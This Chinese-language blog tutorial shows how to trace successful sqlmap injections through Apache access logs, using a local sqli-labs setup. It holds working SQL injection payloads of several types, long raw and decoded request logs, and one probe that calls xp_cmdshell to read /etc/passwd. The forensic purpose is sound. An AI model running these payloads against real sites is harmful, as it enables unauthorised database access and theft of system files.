Sqlmap 是一个 Web 安全从业者必备的自动化注入工具,我们经常使用 Sqlmap 来进行自动化注入,那有没有尝试过通过 Sqlmap 的注入日志来溯源判断真实有效的注入语句呢?

环境搭建

本次测试在 Windows 上使用 PhpStudy 来搭建 sqlmap 靶场:

sqli-labs项目地址: https://github.com/Audi-1/sqli-labs

PhpStudy官网: https://www.xp.cn/

插入测试数据

安装完,备份好 users 表,然后清空数据库后插入如下数据:

INSERT INTO `security`.`users`(`id`, `username`, `password`) VALUES (1, 'admin', '161ebd7d45089b3446ee4e0d86dbcf92')

其中161ebd7d45089b3446ee4e0d86dbcf92P@ssw0rd的MD5加密后的值,这样更贴近实战模拟。

开启网站日志

点击其他选项菜单-打开配置文件-httpd-conf,找到如下内容:

##CustomLog "logs/access.log" common

删掉前面的##取消注释,重启 Apache 服务器生效。修改完成后访问网站,此时日志功能正常:

关闭魔术引号

PHP参数开关设置里面取消勾选magic_quotes_gpc,这样 sqlmap注入的一些危险字符就不会被过滤掉了,可以让我们的注入实验顺利进行下去:

注入检测

本文使用 sqlmap 的第一关进行测试,这一关基本上包含了很多常见的注入类型,方便我们直接上手操作。

sqlmap -u "http://10.211.55.3/sqli/Less-1/?id=1" -v 3 --flush-session

检测的注入结果有如下 4 种类型:

---
# GET型布尔类型盲注
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7091=7091 AND 'BKrj'='BKrj
    Vector: AND [INFERENCE]

# 报错型注入
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 7957 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(7957=7957,1))),0x7170787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lHCY'='lHCY
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

# 延时类型盲注
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(5)))OpvZ) AND 'Mrpf'='Mrpf
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

# UNION联合查询注入
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8913' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x52744f49757a50454879437574454c547a6f4d5a7962687768576c4c686465534d5863485857696b,0x7170787671)-- EMQz
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY][GENERIC_SQL_COMMENT]
---
[09:19:57] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.2.17
back-end DBMS: MySQL >= 5.0

查看检测注入的时候日志记录情况:

10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1&jWCD=8167%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=5866 HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1%28%2C%28%27%22%2C.%28%29. HTTP/1.1" 200 833
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1%27YpREvd%3C%27%22%3EotlBiB HTTP/1.1" 200 843
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%29%20AND%205700%3D1453%20AND%20%289717%3D9717 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%29%20AND%207091%3D7091%20AND%20%287487%3D7487 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%20AND%205946%3D8467 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%20AND%207091%3D7091 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%20AND%207606%3D9874--%20Hgwl HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%20AND%207091%3D7091--%20AUkp HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%29%20AND%207695%3D7758%20AND%20%28%27cgCi%27%3D%27cgCi HTTP/1.1" 200 860
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%29%20AND%207091%3D7091%20AND%20%28%27GMtd%27%3D%27GMtd HTTP/1.1" 200 860
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%208885%3D9726%20AND%20%27wgHB%27%3D%27wgHB HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%207091%3D7091%20AND%20%27BKrj%27%3D%27BKrj HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%206775%3D8339%20AND%20%27VDmE%27%3D%27VDmE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%282715%3D2715%2C1%29%29%29%2C0x7170787671%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29%20AND%20%27pTZE%27%3D%27pTZE HTTP/1.1" 200 985
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20OR%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%287905%3D7905%2C1%29%29%29%2C0x7170787671%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29%20AND%20%27UvdD%27%3D%27UvdD HTTP/1.1" 200 985
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%281643%3D1643%2C1%29%29%29%2C0x7170787671%2C0x78%29%29x%29%29%20AND%20%27dCkT%27%3D%27dCkT HTTP/1.1" 200 943
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20OR%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%287989%3D7989%2C1%29%29%29%2C0x7170787671%2C0x78%29%29x%29%29%20AND%20%27GJvf%27%3D%27GJvf HTTP/1.1" 200 943
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%285275%3D5275%2C1%29%29%29%2C0x7170787671%29%29%20USING%20utf8%29%29%29%20AND%20%27tsFH%27%3D%27tsFH HTTP/1.1" 200 712
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%283959%3D3959%2C1%29%29%29%2C0x7170787671%29%29%20USING%20utf8%29%29%29%20AND%20%27LawY%27%3D%27LawY HTTP/1.1" 200 712
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20%28SELECT%207957%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176767171%2C%28SELECT%20%28ELT%287957%3D7957%2C1%29%29%29%2C0x7170787671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29%20AND%20%27lHCY%27%3D%27lHCY HTTP/1.1" 200 720
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=%28SELECT%20CONCAT%280x7176767171%2C%28SELECT%20%28ELT%282593%3D2593%2C1%29%29%29%2C0x7170787671%29%29 HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%3BSELECT%20SLEEP%285%29%23 HTTP/1.1" 200 843
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%3BSELECT%20SLEEP%285%29%20AND%20%27zOkG%27%3D%27zOkG HTTP/1.1" 200 859
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29czFP%29%23 HTTP/1.1" 200 866
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29epZY%29%20AND%20%27yzqr%27%3D%27yzqr HTTP/1.1" 200 882
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%3BSELECT%20BENCHMARK%285000000%2CMD5%280x62414652%29%29%23 HTTP/1.1" 200 869
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%3BSELECT%20BENCHMARK%285000000%2CMD5%280x53535946%29%29%20AND%20%27SCFh%27%3D%27SCFh HTTP/1.1" 200 885
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20%28SELECT%209252%20FROM%20%28SELECT%28SLEEP%285%29%29%29OpvZ%29%20AND%20%27Mrpf%27%3D%27Mrpf HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:46 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20%28SELECT%209252%20FROM%20%28SELECT%28SLEEP%280%29%29%29OpvZ%29%20AND%20%27Mrpf%27%3D%27Mrpf HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:46 +0800] "GET /sqli/Less-1/?id=1%27%20AND%20%28SELECT%209252%20FROM%20%28SELECT%28SLEEP%285%29%29%29OpvZ%29%20AND%20%27Mrpf%27%3D%27Mrpf HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20ORDER%20BY%201--%20eClE HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20ORDER%20BY%201447--%20gzBn HTTP/1.1" 200 709
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20ORDER%20BY%2010--%20ISlS HTTP/1.1" 200 707
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20ORDER%20BY%206--%20kioI HTTP/1.1" 200 706
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20ORDER%20BY%204--%20ObNO HTTP/1.1" 200 706
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20ORDER%20BY%203--%20swSX HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7176767171%2C0x474b584c516e644368717a736f49616779704762597574766e526c5a4444715159756f6c70616a54%2C0x7170787671%29%2CNULL--%20mhjz HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176767171%2C0x61694c43687475757a6442747153624d6454774e5873474555794d7a66574853447271517770564c%2C0x7170787671%29--%20uPFk HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176767171%2C0x597a525571594c42486f644472774d64427a44464b6f584872534b526f5667456d4e5656697a4a76%2C0x7170787671%29%2CNULL%2CNULL--%20SXNE HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7176767171%2C0x6f777272525252575767%2C0x7170787671%29%2CNULL--%20UKyq HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176767171%2C0x58596e52796148654748%2C0x7170787671%29--%20MXcU HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176767171%2C0x4d6d747555626a58716b%2C0x7170787671%29%2CNULL%2CNULL--%20vsbu HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=-7078%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176767171%2C0x75506e464a585570427a744c6d7a6c5255454d4a71505a6750524777595a4e4671576344644c704f%2C0x7170787671%29%2CNULL%2CNULL--%20CSdm HTTP/1.1" 200 713
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=-8913%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176767171%2C0x52744f49757a50454879437574454c547a6f4d5a7962687768576c4c686465534d5863485857696b%2C0x7170787671%29--%20EMQz HTTP/1.1" 200 763
10.211.55.2 - - [02/Nov/2019:09:18:52 +0800] "GET /sqli/Less-1/?id=-1568%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176767171%2C%28CASE%20WHEN%20%286689%3D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%206689%29%20THEN%201%20ELSE%200%20END%29%2C0x7170787671%29--%20NGYK HTTP/1.1" 200 724
10.211.55.2 - - [02/Nov/2019:09:19:52 +0800] "-" 408 -

这样乍一看观感的确不好,下面手动将一些 SQL 注入过程中的特殊编码字符替换一下:

查找字符 替换字符
%20 空格
%27
%22
%3B ;
%28 (
%29 )
%2C ,
%2A *
%23 #
%3D =
%7E ~

日志内容美化后内容如下:

10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1&jWCD=8167 AND 1=1 UNION ALL SELECT 1,NULL,'%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E',table_name FROM information_schema.tables WHERE 2%3E1--%2F**%2F; EXEC xp_cmdshell('cat ..%2F..%2F..%2Fetc%2Fpasswd')# HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=5866 HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1(,('%22,.(). HTTP/1.1" 200 833
10.211.55.2 - - [02/Nov/2019:09:18:37 +0800] "GET /sqli/Less-1/?id=1'YpREvd%3C'%22%3EotlBiB HTTP/1.1" 200 843
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1) AND 5700=1453 AND (9717=9717 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1) AND 7091=7091 AND (7487=7487 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 AND 5946=8467 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 AND 7091=7091 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 AND 7606=9874-- Hgwl HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 AND 7091=7091-- AUkp HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1') AND 7695=7758 AND ('cgCi'='cgCi HTTP/1.1" 200 860
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1') AND 7091=7091 AND ('GMtd'='GMtd HTTP/1.1" 200 860
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND 8885=9726 AND 'wgHB'='wgHB HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND 7091=7091 AND 'BKrj'='BKrj HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND 6775=8339 AND 'VDmE'='VDmE HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(2715=2715,1))),0x7170787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'pTZE'='pTZE HTTP/1.1" 200 985
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(7905=7905,1))),0x7170787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'UvdD'='UvdD HTTP/1.1" 200 985
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(1643=1643,1))),0x7170787671,0x78))x)) AND 'dCkT'='dCkT HTTP/1.1" 200 943
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(7989=7989,1))),0x7170787671,0x78))x)) AND 'GJvf'='GJvf HTTP/1.1" 200 943
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176767171,(SELECT (ELT(5275=5275,1))),0x7170787671)) USING utf8))) AND 'tsFH'='tsFH HTTP/1.1" 200 712
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176767171,(SELECT (ELT(3959=3959,1))),0x7170787671)) USING utf8))) AND 'LawY'='LawY HTTP/1.1" 200 712
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND (SELECT 7957 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(7957=7957,1))),0x7170787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lHCY'='lHCY HTTP/1.1" 200 720
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=(SELECT CONCAT(0x7176767171,(SELECT (ELT(2593=2593,1))),0x7170787671)) HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1';SELECT SLEEP(5)# HTTP/1.1" 200 843
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1';SELECT SLEEP(5) AND 'zOkG'='zOkG HTTP/1.1" 200 859
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1';(SELECT * FROM (SELECT(SLEEP(5)))czFP)# HTTP/1.1" 200 866
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1';(SELECT * FROM (SELECT(SLEEP(5)))epZY) AND 'yzqr'='yzqr HTTP/1.1" 200 882
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1';SELECT BENCHMARK(5000000,MD5(0x62414652))# HTTP/1.1" 200 869
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1';SELECT BENCHMARK(5000000,MD5(0x53535946)) AND 'SCFh'='SCFh HTTP/1.1" 200 885
10.211.55.2 - - [02/Nov/2019:09:18:41 +0800] "GET /sqli/Less-1/?id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(5)))OpvZ) AND 'Mrpf'='Mrpf HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:46 +0800] "GET /sqli/Less-1/?id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(0)))OpvZ) AND 'Mrpf'='Mrpf HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:46 +0800] "GET /sqli/Less-1/?id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(5)))OpvZ) AND 'Mrpf'='Mrpf HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' ORDER BY 1-- eClE HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' ORDER BY 1447-- gzBn HTTP/1.1" 200 709
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' ORDER BY 10-- ISlS HTTP/1.1" 200 707
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' ORDER BY 6-- kioI HTTP/1.1" 200 706
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' ORDER BY 4-- ObNO HTTP/1.1" 200 706
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' ORDER BY 3-- swSX HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,CONCAT(0x7176767171,0x474b584c516e644368717a736f49616779704762597574766e526c5a4444715159756f6c70616a54,0x7170787671),NULL-- mhjz HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x61694c43687475757a6442747153624d6454774e5873474555794d7a66574853447271517770564c,0x7170787671)-- uPFk HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT CONCAT(0x7176767171,0x597a525571594c42486f644472774d64427a44464b6f584872534b526f5667456d4e5656697a4a76,0x7170787671),NULL,NULL-- SXNE HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,CONCAT(0x7176767171,0x6f777272525252575767,0x7170787671),NULL-- UKyq HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x58596e52796148654748,0x7170787671)-- MXcU HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT CONCAT(0x7176767171,0x4d6d747555626a58716b,0x7170787671),NULL,NULL-- vsbu HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=-7078' UNION ALL SELECT CONCAT(0x7176767171,0x75506e464a585570427a744c6d7a6c5255454d4a71505a6750524777595a4e4671576344644c704f,0x7170787671),NULL,NULL-- CSdm HTTP/1.1" 200 713
